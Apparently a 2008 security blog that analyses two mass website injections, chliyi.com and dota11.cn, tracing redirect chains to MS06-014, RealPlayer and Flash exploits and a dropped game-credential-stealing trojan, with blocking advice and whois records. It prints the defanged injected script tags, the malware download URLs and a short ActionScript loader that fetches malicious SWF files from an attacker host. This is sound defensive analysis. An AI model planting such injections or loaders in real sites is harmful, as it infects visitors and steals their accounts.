According to my Google searching chliyi.com has successfully been injected onto about ~12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe this exploit does not work on the newest version of the Flash Player version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry page for this injection is chliyi.com/reg.js using the following code

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfustication, but does contain some interesting logic as you can see.

Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed be a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfustication starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfustication is done with VBScript and looks like this:

My first deobfustication revealed even more VBScript obfustication and can be seen here:

After the second deobfustication we see the first portion of the decision tree in choosing which exploits to send to the users computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successfully the next page that the user is directed to is the help.htm page, and if it is unsuccessfully created the user will be sent over to a serious of exploits to include the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfusticated with VBScript as well, but defiantly not as complicated. The obfusticated page looked like this:

Deobfusticated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me keep you systems patched to avoid old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%) which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealer's. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Here lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealer's.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfusticating Flash files, but what I did notice is there is no action script associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript obfusticated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfustication process took two VBScript deobfustications to display the actual JavaScript rendered exploit seen here:

I didn't include the obfusticated code snapshots as they were actually very large files with to many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfustication took 2 VBScript decodes to render the following code:

Obviously none of these exploits being severed up by this malicious domain are 0-day's, so if you will just keep your systems up to date and exercise alittle bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis chliyi.com and jj120.net at the very minimum if you have that capability. Another option would be to block the IPs associated with these domain chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections server as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to rendor one of two iframe redirections based off your browsers language settings. If you have the Chinese language back configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese Language pack. The le.htm file will attempt to server a Real Player exploit (CVE-2007-5601) to you and more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gather web server: vip2.51.la/go.asp. Strategically placing these statistic gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source sode here in PDF format: 1662569_js. Source Code and le_htm Source Code

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese Language pack. This file appears to be the most complex piece to this malicious schema with several logically choosen exploits being severed up and is obfusticated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object you will be iframed redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601 and is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to xxp://www.dota11.cn/rl.htm, where this vulnerability will be attempted to be exploited. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerabilty (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm which looks like a left behind iframe refrence that the designer forgot to clean up. I say this because I recieved a 404 error when I tryed grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files although hosted on separate domains contain the exact same content. Both of these are serving up malicious Flash Media files. If your using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded Action Script logic to redirect you to a malicious Flash Media file based off your Flash media player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following exert is from the Action Script being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.